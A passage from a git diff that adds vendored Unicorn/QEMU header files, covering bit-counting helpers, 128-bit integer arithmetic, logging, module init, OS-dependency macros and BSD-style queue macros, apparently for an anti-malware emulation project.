*/ + int cnt; + + cnt = 0; + if (!(val & 0x0000FFFFUL)) { + cnt += 16; + val >>= 16; + } + if (!(val & 0x000000FFUL)) { + cnt += 8; + val >>= 8; + } + if (!(val & 0x0000000FUL)) { + cnt += 4; + val >>= 4; + } + if (!(val & 0x00000003UL)) { + cnt += 2; + val >>= 2; + } + if (!(val & 0x00000001UL)) { + cnt++; + val >>= 1; + } + if (!(val & 0x00000001UL)) { + cnt++; + } + + return cnt; +#endif +} + +/** + * cto32 - count trailing ones in a 32-bit value. + * @val: The value to search + * + * Returns 32 if the value is -1. + */ +static inline int cto32(uint32_t val) +{ + return ctz32(~val); +} + +/** + * ctz64 - count trailing zeros in a 64-bit value. + * @val: The value to search + * + * Returns 64 if the value is zero. Note that the GCC builtin is + * undefined if the value is zero. + */ +static inline int ctz64(uint64_t val) +{ +#if QEMU_GNUC_PREREQ(3, 4) + return val ? __builtin_ctzll(val) : 64; +#else + int cnt; + + cnt = 0; + if (!((uint32_t)val)) { + cnt += 32; + val >>= 32; + } + + return cnt + ctz32((uint32_t)val); +#endif +} + +/** + * cto64 - count trailing ones in a 64-bit value. + * @val: The value to search + * + * Returns 64 if the value is -1. + */ +static inline int cto64(uint64_t val) +{ + return ctz64(~val); +} + +/** + * clrsb32 - count leading redundant sign bits in a 32-bit value. + * @val: The value to search + * + * Returns the number of bits following the sign bit that are equal to it. + * No special cases; output range is [0-31]. + */ +static inline int clrsb32(uint32_t val) +{ +#if QEMU_GNUC_PREREQ(4, 7) + return __builtin_clrsb(val); +#else + return clz32(val ^ ((int32_t)val >> 1)) - 1; +#endif +} + +/** + * clrsb64 - count leading redundant sign bits in a 64-bit value. + * @val: The value to search + * + * Returns the number of bits following the sign bit that are equal to it. + * No special cases; output range is [0-63]. 
+ */ +static inline int clrsb64(uint64_t val) +{ +#if QEMU_GNUC_PREREQ(4, 7) + return __builtin_clrsbll(val); +#else + return clz64(val ^ ((int64_t)val >> 1)) - 1; +#endif +} + +/** + * ctpop8 - count the population of one bits in an 8-bit value. + * @val: The value to search + */ +static inline int ctpop8(uint8_t val) +{ +#if QEMU_GNUC_PREREQ(3, 4) + return __builtin_popcount(val); +#else + val = (val & 0x55) + ((val >> 1) & 0x55); + val = (val & 0x33) + ((val >> 2) & 0x33); + val = (val & 0x0f) + ((val >> 4) & 0x0f); + + return val; +#endif +} + +/** + * ctpop16 - count the population of one bits in a 16-bit value. + * @val: The value to search + */ +static inline int ctpop16(uint16_t val) +{ +#if QEMU_GNUC_PREREQ(3, 4) + return __builtin_popcount(val); +#else + val = (val & 0x5555) + ((val >> 1) & 0x5555); + val = (val & 0x3333) + ((val >> 2) & 0x3333); + val = (val & 0x0f0f) + ((val >> 4) & 0x0f0f); + val = (val & 0x00ff) + ((val >> 8) & 0x00ff); + + return val; +#endif +} + +/** + * ctpop32 - count the population of one bits in a 32-bit value. + * @val: The value to search + */ +static inline int ctpop32(uint32_t val) +{ +#if QEMU_GNUC_PREREQ(3, 4) + return __builtin_popcount(val); +#else + val = (val & 0x55555555) + ((val >> 1) & 0x55555555); + val = (val & 0x33333333) + ((val >> 2) & 0x33333333); + val = (val & 0x0f0f0f0f) + ((val >> 4) & 0x0f0f0f0f); + val = (val & 0x00ff00ff) + ((val >> 8) & 0x00ff00ff); + val = (val & 0x0000ffff) + ((val >> 16) & 0x0000ffff); + + return val; +#endif +} + +/** + * ctpop64 - count the population of one bits in a 64-bit value. 
+ * @val: The value to search + */ +static inline int ctpop64(uint64_t val) +{ +#if QEMU_GNUC_PREREQ(3, 4) + return __builtin_popcountll(val); +#else + val = (val & 0x5555555555555555ULL) + ((val >> 1) & 0x5555555555555555ULL); + val = (val & 0x3333333333333333ULL) + ((val >> 2) & 0x3333333333333333ULL); + val = (val & 0x0f0f0f0f0f0f0f0fULL) + ((val >> 4) & 0x0f0f0f0f0f0f0f0fULL); + val = (val & 0x00ff00ff00ff00ffULL) + ((val >> 8) & 0x00ff00ff00ff00ffULL); + val = (val & 0x0000ffff0000ffffULL) + ((val >> 16) & 0x0000ffff0000ffffULL); + val = (val & 0x00000000ffffffffULL) + ((val >> 32) & 0x00000000ffffffffULL); + + return (int)val; +#endif +} + +/* Host type specific sizes of these routines. */ + +#if ULONG_MAX == UINT32_MAX +# define clzl clz32 +# define ctzl ctz32 +# define clol clo32 +# define ctol cto32 +# define ctpopl ctpop32 +#elif ULONG_MAX == UINT64_MAX +# define clzl clz64 +# define ctzl ctz64 +# define clol clo64 +# define ctol cto64 +# define ctpopl ctpop64 +#else +# error Unknown sizeof long +#endif + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/int128.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/int128.h new file mode 100644 index 0000000..f435210 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/int128.h @@ -0,0 +1,157 @@ +#ifndef INT128_H +#define INT128_H + +//#include <assert.h> +#include "unicorn/platform.h" + +typedef struct Int128 Int128; + +struct Int128 { + uint64_t lo; + int64_t hi; +}; + +static inline Int128 int128_make64(uint64_t a) +{ + Int128 i128 = { a, 0 }; + return i128; +} + +static inline uint64_t int128_get64(Int128 a) +{ + //assert(!a.hi); + return a.lo; +} + +static inline Int128 int128_zero(void) +{ + return int128_make64(0); +} + +static inline Int128 int128_one(void) +{ + return int128_make64(1); +} + +static inline Int128 int128_2_64(void) +{ + Int128 i128 = { 0, 1 }; + return i128; +} + +static inline Int128 int128_exts64(int64_t a) +{ + Int128 
i128 = { a, (a < 0) ? -1 : 0 }; + return i128; +} + +static inline Int128 int128_and(Int128 a, Int128 b) +{ + Int128 i128 = { a.lo & b.lo, a.hi & b.hi }; + return i128; +} + +static inline Int128 int128_rshift(Int128 a, int n) +{ + int64_t h; + if (!n) { + return a; + } + h = a.hi >> (n & 63); + if (n >= 64) { + Int128 i128 = { h, h >> 63 }; + return i128; + } else { + Int128 i128 = { (a.lo >> n) | ((uint64_t)a.hi << (64 - n)), h }; + return i128; + } +} + +static inline Int128 int128_add(Int128 a, Int128 b) +{ + uint64_t lo = a.lo + b.lo; + + /* a.lo <= a.lo + b.lo < a.lo + k (k is the base, 2^64). Hence, + * a.lo + b.lo >= k implies 0 <= lo = a.lo + b.lo - k < a.lo. + * Similarly, a.lo + b.lo < k implies a.lo <= lo = a.lo + b.lo < k. + * + * So the carry is lo < a.lo. + */ + Int128 i128 = { lo, (uint64_t)a.hi + b.hi + (lo < a.lo) }; + return i128; +} + +static inline Int128 int128_neg(Int128 a) +{ + uint64_t lo = 0-a.lo; + Int128 i128 = { lo, ~(uint64_t)a.hi + !lo }; + return i128; +} + +static inline Int128 int128_sub(Int128 a, Int128 b) +{ + Int128 i128 = { a.lo - b.lo, (uint64_t)a.hi - b.hi - (a.lo < b.lo) }; + return i128; +} + +static inline bool int128_nonneg(Int128 a) +{ + return a.hi >= 0; +} + +static inline bool int128_eq(Int128 a, Int128 b) +{ + return a.lo == b.lo && a.hi == b.hi; +} + +static inline bool int128_ne(Int128 a, Int128 b) +{ + return !int128_eq(a, b); +} + +static inline bool int128_ge(Int128 a, Int128 b) +{ + return a.hi > b.hi || (a.hi == b.hi && a.lo >= b.lo); +} + +static inline bool int128_lt(Int128 a, Int128 b) +{ + return !int128_ge(a, b); +} + +static inline bool int128_le(Int128 a, Int128 b) +{ + return int128_ge(b, a); +} + +static inline bool int128_gt(Int128 a, Int128 b) +{ + return !int128_le(a, b); +} + +static inline bool int128_nz(Int128 a) +{ + return a.lo || a.hi; +} + +static inline Int128 int128_min(Int128 a, Int128 b) +{ + return int128_le(a, b) ? 
a : b; +} + +static inline Int128 int128_max(Int128 a, Int128 b) +{ + return int128_ge(a, b) ? a : b; +} + +static inline void int128_addto(Int128 *a, Int128 b) +{ + *a = int128_add(*a, b); +} + +static inline void int128_subfrom(Int128 *a, Int128 b) +{ + *a = int128_sub(*a, b); +} + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/log.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/log.h new file mode 100644 index 0000000..6f9ccdf --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/log.h @@ -0,0 +1,117 @@ +#ifndef QEMU_LOG_H +#define QEMU_LOG_H + +#include <stdarg.h> +#include "unicorn/platform.h" +#include "qemu/compiler.h" +#include "qom/cpu.h" + +/* Private global variables, don't use */ +extern FILE *qemu_logfile; +extern int qemu_loglevel; + +/* + * The new API: + * + */ + +/* Log settings checking macros: */ + +/* Returns true if qemu_log() will really write somewhere + */ +static inline bool qemu_log_enabled(void) +{ + return qemu_logfile != NULL; +} + +#define CPU_LOG_TB_OUT_ASM (1 << 0) +#define CPU_LOG_TB_IN_ASM (1 << 1) +#define CPU_LOG_TB_OP (1 << 2) +#define CPU_LOG_TB_OP_OPT (1 << 3) +#define CPU_LOG_INT (1 << 4) +#define CPU_LOG_EXEC (1 << 5) +#define CPU_LOG_PCALL (1 << 6) +#define CPU_LOG_IOPORT (1 << 7) +#define CPU_LOG_TB_CPU (1 << 8) +#define CPU_LOG_RESET (1 << 9) +#define LOG_UNIMP (1 << 10) +#define LOG_GUEST_ERROR (1 << 11) + +/* Returns true if a bit is set in the current loglevel mask + */ +static inline bool qemu_loglevel_mask(int mask) +{ + return (qemu_loglevel & mask) != 0; +} + +/* Logging functions: */ + +/* main logging function + */ +void GCC_FMT_ATTR(1, 2) qemu_log(const char *fmt, ...); + +/* vfprintf-like logging function + */ +static inline void GCC_FMT_ATTR(1, 0) +qemu_log_vprintf(const char *fmt, va_list va) +{ + if (qemu_logfile) { + vfprintf(qemu_logfile, fmt, va); + } +} + +/* log only if a bit is set on the current loglevel mask + */ +void GCC_FMT_ATTR(2, 
3) qemu_log_mask(int mask, const char *fmt, ...); + + +/* Special cases: */ + +/* cpu_dump_state() logging functions: */ +/** + * log_cpu_state: + * @cpu: The CPU whose state is to be logged. + * @flags: Flags what to log. + * + * Logs the output of cpu_dump_state(). + */ +static inline void log_cpu_state(CPUState *cpu, int flags) +{ + if (qemu_log_enabled()) { + cpu_dump_state(cpu, qemu_logfile, fprintf, flags); + } +} + +/** + * log_cpu_state_mask: + * @mask: Mask when to log. + * @cpu: The CPU whose state is to be logged. + * @flags: Flags what to log. + * + * Logs the output of cpu_dump_state() if loglevel includes @mask. + */ +static inline void log_cpu_state_mask(int mask, CPUState *cpu, int flags) +{ + if (qemu_loglevel & mask) { + log_cpu_state(cpu, flags); + } +} + +/* fflush() the log file */ +static inline void qemu_log_flush(void) +{ + fflush(qemu_logfile); +} + +/* Close the log file */ +static inline void qemu_log_close(void) +{ + if (qemu_logfile) { + if (qemu_logfile != stderr) { + fclose(qemu_logfile); + } + qemu_logfile = NULL; + } +} + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/module.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/module.h new file mode 100644 index 0000000..01b9fe5 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/module.h @@ -0,0 +1,30 @@ +/* + * QEMU Module Infrastructure + * + * Copyright IBM, Corp. 2009 + * + * Authors: + * Anthony Liguori <aliguori@us.ibm.com> + * + * This work is licensed under the terms of the GNU GPL, version 2. See + * the COPYING file in the top-level directory. 
+ * + */ + +#ifndef QEMU_MODULE_H +#define QEMU_MODULE_H + +#include "qemu/osdep.h" + +typedef enum { + MODULE_INIT_MACHINE, + MODULE_INIT_QOM, + MODULE_INIT_MAX +} module_init_type; + +#define machine_init(function) module_init(function, MODULE_INIT_MACHINE) +#define type_init(function) module_init(function, MODULE_INIT_QOM) + +void module_call_init(struct uc_struct *uc, module_init_type type); + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/osdep.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/osdep.h new file mode 100644 index 0000000..5387816 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/osdep.h @@ -0,0 +1,128 @@ +#ifndef QEMU_OSDEP_H +#define QEMU_OSDEP_H + +#include "config-host.h" +#include <stdarg.h> +#include <stddef.h> +#include "unicorn/platform.h" +#include <sys/types.h> +#ifdef __OpenBSD__ +#include <sys/signal.h> +#endif + +#ifndef _WIN32 +#include <sys/wait.h> +#else +#define WIFEXITED(x) 1 +#define WEXITSTATUS(x) (x) +#endif + +#if defined(CONFIG_SOLARIS) && CONFIG_SOLARIS_VERSION < 10 +/* [u]int_fast*_t not in <sys/int_types.h> */ +typedef unsigned char uint_fast8_t; +typedef unsigned int uint_fast16_t; +typedef signed int int_fast16_t; +#endif + +#ifndef glue +#define xglue(x, y) x ## y +#define glue(x, y) xglue(x, y) +#define stringify(s) tostring(s) +#define tostring(s) #s +#endif + +#ifndef likely +#if __GNUC__ < 3 +#define __builtin_expect(x, n) (x) +#endif + +#define likely(x) __builtin_expect(!!(x), 1) +#define unlikely(x) __builtin_expect(!!(x), 0) +#endif + +#ifndef container_of +#ifndef _MSC_VER +#define container_of(ptr, type, member) ({ \ + const typeof(((type *) 0)->member) *__mptr = (ptr); \ + (type *) ((char *) __mptr - offsetof(type, member));}) +#else +#define container_of(ptr, type, member) ((type *)((char *)(ptr) -offsetof(type,member))) +#endif +#endif + +/* Convert from a base type to a parent type, with compile time checking. 
*/ +#ifdef __GNUC__ +#define DO_UPCAST(type, field, dev) ( __extension__ ( { \ + char QEMU_UNUSED_VAR offset_must_be_zero[ \ + -offsetof(type, field)]; \ + container_of(dev, type, field);})) +#else +#define DO_UPCAST(type, field, dev) container_of(dev, type, field) +#endif + +#define typeof_field(type, field) typeof(((type *)0)->field) +#define type_check(t1,t2) ((t1*)0 - (t2*)0) + +#ifndef MIN +#define MIN(a, b) (((a) < (b)) ? (a) : (b)) +#endif +#ifndef MAX +#define MAX(a, b) (((a) > (b)) ? (a) : (b)) +#endif + +/* Minimum function that returns zero only iff both values are zero. + * Intended for use with unsigned values only. */ +#ifndef MIN_NON_ZERO +#define MIN_NON_ZERO(a, b) (((a) != 0 && (a) < (b)) ? (a) : (b)) +#endif + +#ifndef ROUND_UP +#define ROUND_UP(n,d) (((n) + (d) - 1) & -(d)) +#endif + +#ifndef DIV_ROUND_UP +#define DIV_ROUND_UP(n,d) (((n) + (d) - 1) / (d)) +#endif + +#ifndef ARRAY_SIZE +#define ARRAY_SIZE(x) (sizeof(x) / sizeof((x)[0])) +#endif + +#ifndef always_inline +#if !((__GNUC__ < 3) || defined(__APPLE__)) +#ifdef __OPTIMIZE__ +#undef inline +#define inline __attribute__ (( always_inline )) __inline__ +#endif +#endif +#else +#undef inline +#define inline always_inline +#endif + +#define qemu_printf printf + +void *qemu_try_memalign(size_t alignment, size_t size); +void *qemu_memalign(size_t alignment, size_t size); +void *qemu_anon_ram_alloc(size_t size, uint64_t *align); +void qemu_vfree(void *ptr); +void qemu_anon_ram_free(void *ptr, size_t size); + +#if defined(__HAIKU__) && defined(__i386__) +#define FMT_pid "%ld" +#elif defined(WIN64) +#define FMT_pid "%" PRId64 +#else +#define FMT_pid "%d" +#endif + +/** + * qemu_getauxval: + * @type: the auxiliary vector key to lookup + * + * Search the auxiliary vector for @type, returning the value + * or 0 if @type is not present. 
+ */ +unsigned long qemu_getauxval(unsigned long type); + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/queue.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/queue.h new file mode 100644 index 0000000..d433b90 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/queue.h @@ -0,0 +1,414 @@ +/* $NetBSD: queue.h,v 1.52 2009/04/20 09:56:08 mschuett Exp $ */ + +/* + * QEMU version: Copy from netbsd, removed debug code, removed some of + * the implementations. Left in singly-linked lists, lists, simple + * queues, and tail queues. + */ + +/* + * Copyright (c) 1991, 1993 + * The Regents of the University of California. All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions + * are met: + * 1. Redistributions of source code must retain the above copyright + * notice, this list of conditions and the following disclaimer. + * 2. Redistributions in binary form must reproduce the above copyright + * notice, this list of conditions and the following disclaimer in the + * documentation and/or other materials provided with the distribution. + * 3. Neither the name of the University nor the names of its contributors + * may be used to endorse or promote products derived from this software + * without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND + * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE + * ARE DISCLAIMED. 
IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS + * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) + * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT + * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY + * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF + * SUCH DAMAGE. + * + * @(#)queue.h 8.5 (Berkeley) 8/20/94 + */ + +#ifndef QEMU_SYS_QUEUE_H_ +#define QEMU_SYS_QUEUE_H_ + +/* + * This file defines four types of data structures: singly-linked lists, + * lists, simple queues, and tail queues. + * + * A singly-linked list is headed by a single forward pointer. The + * elements are singly linked for minimum space and pointer manipulation + * overhead at the expense of O(n) removal for arbitrary elements. New + * elements can be added to the list after an existing element or at the + * head of the list. Elements being removed from the head of the list + * should use the explicit macro for this purpose for optimum + * efficiency. A singly-linked list may only be traversed in the forward + * direction. Singly-linked lists are ideal for applications with large + * datasets and few or no removals or for implementing a LIFO queue. + * + * A list is headed by a single forward pointer (or an array of forward + * pointers for a hash table header). The elements are doubly linked + * so that an arbitrary element can be removed without a need to + * traverse the list. New elements can be added to the list before + * or after an existing element or at the head of the list. A list + * may only be traversed in the forward direction. + * + * A simple queue is headed by a pair of pointers, one the head of the + * list and the other to the tail of the list. 
The elements are singly + * linked to save space, so elements can only be removed from the + * head of the list. New elements can be added to the list after + * an existing element, at the head of the list, or at the end of the + * list. A simple queue may only be traversed in the forward direction. + * + * A tail queue is headed by a pair of pointers, one to the head of the + * list and the other to the tail of the list. The elements are doubly + * linked so that an arbitrary element can be removed without a need to + * traverse the list. New elements can be added to the list before or + * after an existing element, at the head of the list, or at the end of + * the list. A tail queue may be traversed in either direction. + * + * For details on the use of these macros, see the queue(3) manual page. + */ + +#include "qemu/atomic.h" /* for smp_wmb() */ + +/* + * List definitions. + */ +#define QLIST_HEAD(name, type) \ +struct name { \ + struct type *lh_first; /* first element */ \ +} + +#define QLIST_HEAD_INITIALIZER(head) \ + { NULL } + +#define QLIST_ENTRY(type) \ +struct { \ + struct type *le_next; /* next element */ \ + struct type **le_prev; /* address of previous next element */ \ +} + +/* + * List functions. 
+ */ +#define QLIST_INIT(head) do { \ + (head)->lh_first = NULL; \ +} while (/*CONSTCOND*/0) + +#define QLIST_INSERT_AFTER(listelm, elm, field) do { \ + if (((elm)->field.le_next = (listelm)->field.le_next) != NULL) \ + (listelm)->field.le_next->field.le_prev = \ + &(elm)->field.le_next; \ + (listelm)->field.le_next = (elm); \ + (elm)->field.le_prev = &(listelm)->field.le_next; \ +} while (/*CONSTCOND*/0) + +#define QLIST_INSERT_BEFORE(listelm, elm, field) do { \ + (elm)->field.le_prev = (listelm)->field.le_prev; \ + (elm)->field.le_next = (listelm); \ + *(listelm)->field.le_prev = (elm); \ + (listelm)->field.le_prev = &(elm)->field.le_next; \ +} while (/*CONSTCOND*/0) + +#define QLIST_INSERT_HEAD(head, elm, field) do { \ + if (((elm)->field.le_next = (head)->lh_first) != NULL) \ + (head)->lh_first->field.le_prev = &(elm)->field.le_next;\ + (head)->lh_first = (elm); \ + (elm)->field.le_prev = &(head)->lh_first; \ +} while (/*CONSTCOND*/0) + +#define QLIST_INSERT_HEAD_RCU(head, elm, field) do { \ + (elm)->field.le_prev = &(head)->lh_first; \ + (elm)->field.le_next = (head)->lh_first; \ + smp_wmb(); /* fill elm before linking it */ \ + if ((head)->lh_first != NULL) { \ + (head)->lh_first->field.le_prev = &(elm)->field.le_next; \ + } \ + (head)->lh_first = (elm); \ + smp_wmb(); \ +} while (/* CONSTCOND*/0) + +#define QLIST_REMOVE(elm, field) do { \ + if ((elm)->field.le_next != NULL) \ + (elm)->field.le_next->field.le_prev = \ + (elm)->field.le_prev; \ + *(elm)->field.le_prev = (elm)->field.le_next; \ +} while (/*CONSTCOND*/0) + +#define QLIST_FOREACH(var, head, field) \ + for ((var) = ((head)->lh_first); \ + (var); \ + (var) = ((var)->field.le_next)) + +#define QLIST_FOREACH_SAFE(var, head, field, next_var) \ + for ((var) = ((head)->lh_first); \ + (var) && ((next_var) = ((var)->field.le_next), 1); \ + (var) = (next_var)) + +/* + * List access methods. 
+ */ +#define QLIST_EMPTY(head) ((head)->lh_first == NULL) +#define QLIST_FIRST(head) ((head)->lh_first) +#define QLIST_NEXT(elm, field) ((elm)->field.le_next) + + +/* + * Singly-linked List definitions. + */ +#define QSLIST_HEAD(name, type) \ +struct name { \ + struct type *slh_first; /* first element */ \ +} + +#define QSLIST_HEAD_INITIALIZER(head) \ + { NULL } + +#define QSLIST_ENTRY(type) \ +struct { \ + struct type *sle_next; /* next element */ \ +} + +/* + * Singly-linked List functions. + */ +#define QSLIST_INIT(head) do { \ + (head)->slh_first = NULL; \ +} while (/*CONSTCOND*/0) + +#define QSLIST_INSERT_AFTER(slistelm, elm, field) do { \ + (elm)->field.sle_next = (slistelm)->field.sle_next; \ + (slistelm)->field.sle_next = (elm); \ +} while (/*CONSTCOND*/0) + +#define QSLIST_INSERT_HEAD(head, elm, field) do { \ + (elm)->field.sle_next = (head)->slh_first; \ + (head)->slh_first = (elm); \ +} while (/*CONSTCOND*/0) + +#define QSLIST_REMOVE_HEAD(head, field) do { \ + (head)->slh_first = (head)->slh_first->field.sle_next; \ +} while (/*CONSTCOND*/0) + +#define QSLIST_REMOVE_AFTER(slistelm, field) do { \ + (slistelm)->field.sle_next = \ + QSLIST_NEXT(QSLIST_NEXT((slistelm), field), field); \ +} while (/*CONSTCOND*/0) + +#define QSLIST_FOREACH(var, head, field) \ + for((var) = (head)->slh_first; (var); (var) = (var)->field.sle_next) + +#define QSLIST_FOREACH_SAFE(var, head, field, tvar) \ + for ((var) = QSLIST_FIRST((head)); \ + (var) && ((tvar) = QSLIST_NEXT((var), field), 1); \ + (var) = (tvar)) + +/* + * Singly-linked List access methods. + */ +#define QSLIST_EMPTY(head) ((head)->slh_first == NULL) +#define QSLIST_FIRST(head) ((head)->slh_first) +#define QSLIST_NEXT(elm, field) ((elm)->field.sle_next) + + +/* + * Simple queue definitions. 
+ */ +#define QSIMPLEQ_HEAD(name, type) \ +struct name { \ + struct type *sqh_first; /* first element */ \ + struct type **sqh_last; /* addr of last next element */ \ +} + +#define QSIMPLEQ_HEAD_INITIALIZER(head) \ + { NULL, &(head).sqh_first } + +#define QSIMPLEQ_ENTRY(type) \ +struct { \ + struct type *sqe_next; /* next element */ \ +} + +/* + * Simple queue functions. + */ +#define QSIMPLEQ_INIT(head) do { \ + (head)->sqh_first = NULL; \ + (head)->sqh_last = &(head)->sqh_first; \ +} while (/*CONSTCOND*/0) + +#define QSIMPLEQ_INSERT_HEAD(head, elm, field) do { \ + if (((elm)->field.sqe_next = (head)->sqh_first) == NULL) \ + (head)->sqh_last = &(elm)->field.sqe_next; \ + (head)->sqh_first = (elm); \ +} while (/*CONSTCOND*/0) + +#define QSIMPLEQ_INSERT_TAIL(head, elm, field) do { \ + (elm)->field.sqe_next = NULL; \ + *(head)->sqh_last = (elm); \ + (head)->sqh_last = &(elm)->field.sqe_next; \ +} while (/*CONSTCOND*/0) + +#define QSIMPLEQ_INSERT_AFTER(head, listelm, elm, field) do { \ + if (((elm)->field.sqe_next = (listelm)->field.sqe_next) == NULL) \ + (head)->sqh_last = &(elm)->field.sqe_next; \ + (listelm)->field.sqe_next = (elm); \ +} while (/*CONSTCOND*/0) + +#define QSIMPLEQ_REMOVE_HEAD(head, field) do { \ + if (((head)->sqh_first = (head)->sqh_first->field.sqe_next) == NULL)\ + (head)->sqh_last = &(head)->sqh_first; \ +} while (/*CONSTCOND*/0) + +#define QSIMPLEQ_REMOVE(head, elm, type, field) do { \ + if ((head)->sqh_first == (elm)) { \ + QSIMPLEQ_REMOVE_HEAD((head), field); \ + } else { \ + struct type *curelm = (head)->sqh_first; \ + while (curelm->field.sqe_next != (elm)) \ + curelm = curelm->field.sqe_next; \ + if ((curelm->field.sqe_next = \ + curelm->field.sqe_next->field.sqe_next) == NULL) \ + (head)->sqh_last = &(curelm)->field.sqe_next; \ + } \ +} while (/*CONSTCOND*/0) + +#define QSIMPLEQ_FOREACH(var, head, field) \ + for ((var) = ((head)->sqh_first); \ + (var); \ + (var) = ((var)->field.sqe_next)) + +#define QSIMPLEQ_FOREACH_SAFE(var, head, field, 
next) \ + for ((var) = ((head)->sqh_first); \ + (var) && ((next = ((var)->field.sqe_next)), 1); \ + (var) = (next)) + +#define QSIMPLEQ_CONCAT(head1, head2) do { \ + if (!QSIMPLEQ_EMPTY((head2))) { \ + *(head1)->sqh_last = (head2)->sqh_first; \ + (head1)->sqh_last = (head2)->sqh_last; \ + QSIMPLEQ_INIT((head2)); \ + } \ +} while (/*CONSTCOND*/0) + +#define QSIMPLEQ_LAST(head, type, field) \ + (QSIMPLEQ_EMPTY((head)) ? \ + NULL : \ + ((struct type *)(void *) \ + ((char *)((head)->sqh_last) - offsetof(struct type, field)))) + +/* + * Simple queue access methods. + */ +#define QSIMPLEQ_EMPTY(head) ((head)->sqh_first == NULL) +#define QSIMPLEQ_FIRST(head) ((head)->sqh_first) +#define QSIMPLEQ_NEXT(elm, field) ((elm)->field.sqe_next) + + +/* + * Tail queue definitions. + */ +#define Q_TAILQ_HEAD(name, type, qual) \ +struct name { \ + qual type *tqh_first; /* first element */ \ + qual type *qual *tqh_last; /* addr of last next element */ \ +} +#define QTAILQ_HEAD(name, type) Q_TAILQ_HEAD(name, struct type,) + +#define QTAILQ_HEAD_INITIALIZER(head) \ + { NULL, &(head).tqh_first } + +#define Q_TAILQ_ENTRY(type, qual) \ +struct { \ + qual type *tqe_next; /* next element */ \ + qual type *qual *tqe_prev; /* address of previous next element */\ +} +#define QTAILQ_ENTRY(type) Q_TAILQ_ENTRY(struct type,) + +/* + * Tail queue functions. 
+ */ +#define QTAILQ_INIT(head) do { \ + (head)->tqh_first = NULL; \ + (head)->tqh_last = &(head)->tqh_first; \ +} while (/*CONSTCOND*/0) + +#define QTAILQ_INSERT_HEAD(head, elm, field) do { \ + if (((elm)->field.tqe_next = (head)->tqh_first) != NULL) \ + (head)->tqh_first->field.tqe_prev = \ + &(elm)->field.tqe_next; \ + else \ + (head)->tqh_last = &(elm)->field.tqe_next; \ + (head)->tqh_first = (elm); \ + (elm)->field.tqe_prev = &(head)->tqh_first; \ +} while (/*CONSTCOND*/0) + +#define QTAILQ_INSERT_TAIL(head, elm, field) do { \ + (elm)->field.tqe_next = NULL; \ + (elm)->field.tqe_prev = (head)->tqh_last; \ + *(head)->tqh_last = (elm); \ + (head)->tqh_last = &(elm)->field.tqe_next; \ +} while (/*CONSTCOND*/0) + +#define QTAILQ_INSERT_AFTER(head, listelm, elm, field) do { \ + if (((elm)->field.tqe_next = (listelm)->field.tqe_next) != NULL)\ + (elm)->field.tqe_next->field.tqe_prev = \ + &(elm)->field.tqe_next; \ + else \ + (head)->tqh_last = &(elm)->field.tqe_next; \ + (listelm)->field.tqe_next = (elm); \ + (elm)->field.tqe_prev = &(listelm)->field.tqe_next; \ +} while (/*CONSTCOND*/0) + +#define QTAILQ_INSERT_BEFORE(listelm, elm, field) do { \ + (elm)->field.tqe_prev = (listelm)->field.tqe_prev; \ + (elm)->field.tqe_next = (listelm); \ + *(listelm)->field.tqe_prev = (elm); \ + (listelm)->field.tqe_prev = &(elm)->field.tqe_next; \ +} while (/*CONSTCOND*/0) + +#define QTAILQ_REMOVE(head, elm, field) do { \ + if (((elm)->field.tqe_next) != NULL) \ + (elm)->field.tqe_next->field.tqe_prev = \ + (elm)->field.tqe_prev; \ + else \ + (head)->tqh_last = (elm)->field.tqe_prev; \ + *(elm)->field.tqe_prev = (elm)->field.tqe_next; \ +} while (/*CONSTCOND*/0) + +#define QTAILQ_FOREACH(var, head, field) \ + for ((var) = ((head)->tqh_first); \ + (var); \ + (var) = ((var)->field.tqe_next)) + +#define QTAILQ_FOREACH_SAFE(var, head, field, next_var) \ + for ((var) = ((head)->tqh_first); \ + (var) && ((next_var) = ((var)->field.tqe_next), 1); \ + (var) = (next_var)) + +#define 
